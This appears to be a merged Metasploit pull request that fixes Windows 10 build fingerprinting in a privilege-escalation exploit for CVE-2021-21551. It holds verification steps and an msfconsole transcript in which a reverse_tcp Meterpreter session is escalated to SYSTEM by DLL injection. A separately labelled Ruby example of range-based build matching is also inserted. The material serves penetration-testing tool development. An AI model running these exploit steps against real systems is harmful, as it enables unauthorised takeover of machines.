
Fix targeting for CVE-2021-21551 #15216

Merged

zeroSteiner

This fixes a mistake I made in the exploit for CVE-2021-21551 where the version fingerprinting is overly specific. I noticed that the exploit was failing when targeting Windows 10 build 18363 since it didn't match the explicit build number 18362. This PR changes the fingerprinting to use ranges to fix this problem. Additionally, I added and tested the build number for the upcoming 21H1 release (available through the insider preview channel). For v21H1 the build number is 19043 and I confirmed that the offsets in EPROCESS are all the same as they are for 20H1 and 20H2.

Verification

  • Install Windows 10 v21H1 by signing up for Windows Insider Preview.
  • Start msfconsole
  • Get a Meterpreter session on a vulnerable host
  • Do: use exploit/windows/local/cve_2021_21551_dbutil_memmove
  • Set the SESSION and PAYLOAD options
  • Do: run
  • You should get a SYSTEM shell.

Example

msf6 payload(windows/x64/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 5...

meterpreter > sysinfo
Computer        : DESKTOP-0Q6QJ6Q
OS              : Windows 10 (10.0 Build 19043).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 4
Meterpreter     : x64/windows
meterpreter > getuid
Server username: DESKTOP-0Q6QJ6Q\aliddle
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)
meterpreter > background 
[*] Backgrounding session 5...
msf6 payload(windows/x64/meterpreter/reverse_tcp) > previous 
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/cve_2021_21551_dbutil_memmove) > show options 

Module options (exploit/windows/local/cve_2021_21551_dbutil_memmove):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  -1               yes       The session to run this module on.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.159.128  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows x64


msf6 exploit(windows/local/cve_2021_21551_dbutil_memmove) > exploit

[-] Handler failed to bind to 192.168.159.128:4444:-  -
[-] Handler failed to bind to 0.0.0.0:4444:-  -
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Launching notepad to host the DLL...
[+] Process 444 launched.
[*] Reflectively injecting the DLL into 444...
[*] Sending stage (200262 bytes) to 192.168.159.109
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Meterpreter session 6 opened (192.168.159.128:4444 -> 192.168.159.109:52865) at 2021-05-18 12:48:01 -0400

[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/cve_2021_21551_dbutil_memmove) > 
msf6 exploit(windows/local/cve_2021_21551_dbutil_memmove) > sessions -i 6
[*] Starting interaction with 6...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-0Q6QJ6Q
OS              : Windows 10 (10.0 Build 19043).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 4
Meterpreter     : x64/windows
meterpreter > 
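The PR's central change is replacing exact build-number matches with ranges, so that a host reporting build 18363 is handled by the same target entry as 18362, and so that 19041 to 19043 (20H1, 20H2 and the 21H1 build the author verified) share one entry. The following is an added example written for this page, not the module's own code: it parses the build number out of the `sysinfo` OS line shown in the transcript above and contrasts the exact-match lookup with a range-based one. The profile names (`:win10_19h1_19h2`, `:win10_20h1_21h1`) are hypothetical labels standing in for whatever per-target data a module keeps; no offsets are included.

```ruby
# Added example, not Metasploit code: range-based Windows 10 build
# fingerprinting versus the exact-match lookup the PR replaced.

# Constructed input in the format Meterpreter's `sysinfo` prints
# (modelled on the transcript in the PR description).
SYSINFO_OS_LINE = 'OS              : Windows 10 (10.0 Build 19043).'

# Pull the numeric build out of a `sysinfo` OS line.
# Returns nil when no "Build NNNNN" token is present.
def parse_build(os_line)
  m = os_line.match(/Build (\d+)/)
  m ? m[1].to_i : nil
end

# Hypothetical target profiles keyed by build range. Builds 18362 and
# 18363 (19H1/19H2) share one profile; 19041..19043 (20H1, 20H2, 21H1)
# share another, which is what the PR author reports verifying.
TARGETS_BY_RANGE = {
  (18362..18363) => :win10_19h1_19h2,
  (19041..19043) => :win10_20h1_21h1
}.freeze

# The overly specific form the PR fixed: one entry per exact build, so
# an unlisted build such as 18363 yields no target at all.
TARGETS_EXACT = {
  18362 => :win10_19h1_19h2,
  19041 => :win10_20h1_21h1,
  19042 => :win10_20h1_21h1
}.freeze

# Exact-match lookup; nil for any build not listed verbatim.
def target_for_exact(build)
  TARGETS_EXACT[build]
end

# Range-based lookup; nil when the build is missing or outside every range.
def target_for_range(build)
  return nil if build.nil?

  entry = TARGETS_BY_RANGE.find { |range, _profile| range.cover?(build) }
  entry && entry[1]
end

if __FILE__ == $PROGRAM_NAME
  build = parse_build(SYSINFO_OS_LINE)
  puts "build #{build}: exact=#{target_for_exact(build).inspect} " \
       "range=#{target_for_range(build).inspect}"
end
```

Running it against the constructed line reports build 19043 as unmatched by the exact table and matched to `:win10_20h1_21h1` by the range table; a build outside every range (for example 18500) still returns nil, which is the behaviour a module's check should preserve rather than silently picking a neighbouring profile.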

@smcintyre-r7 smcintyre-r7 added labels: bug, module, rn-fix, release notes fix (May 18, 2021)
@bwatters-r7 bwatters-r7 self-assigned this May 20, 2021
@bwatters-r7 bwatters-r7 merged commit 8e1391f into rapid7:master May 21, 2021

bwatters-r7 commented May 21, 2021

Release Notes

Fixed a mistake in the exploit for CVE-2021-21551 where the version fingerprinting is overly specific. Windows 10 build 18363 failed because it didn't match the explicit build number 18362. This PR changes the fingerprinting to use ranges to fix this problem.

@zeroSteiner zeroSteiner deleted the fix/cve-2021-21551-win10-targets branch May 25, 2021 19:07